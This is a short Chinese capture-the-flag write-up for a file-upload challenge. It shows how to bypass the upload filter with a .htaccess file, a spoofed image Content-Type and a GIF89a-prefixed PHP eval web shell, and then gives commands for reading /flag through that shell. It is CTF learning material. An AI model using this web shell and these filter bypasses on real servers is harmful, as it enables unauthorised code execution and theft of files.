这题学到的新知识还是多的
进入环境就是一个简单的上传功能
经测试发现带ph的文件不能上传
所以我们这里上传.htaccess
这里检测Content-Type所以我们测试发现能上传的有image/jpeg
使得我们接下来上传的图片马可以被当作php文件解析
同时发现上传的马不能够带有<?
所以用
GIF89a
<script language="php"> @eval($_POST['zxc']); </script>
来绕过,且同上需要修改Content-Type才能上传成功
上传成功后会给出目录按如下路径连接
http://72a496d9-bc18-4e4b-9ef5-45813ee3c9c6.node4.buuoj.cn:81/upload/c3b77fe9b6936dbaca31c839de599f81/11.png
如果连接不上,请多试几次,或者检查自己的马,等等其他情况
然后这里在网页直接用hackbar有很多用法
根据在cmd=phpinfo();里可以看见被禁用的函数
cmd=echo file_get_contents('/flag');
cmd=show_source('/flag');
cmd=var_dump(file_get_contents('/flag'));
cmd=var_dump(scandir('/'));
可能还有许多函数可以利用,只要是未被禁用就可以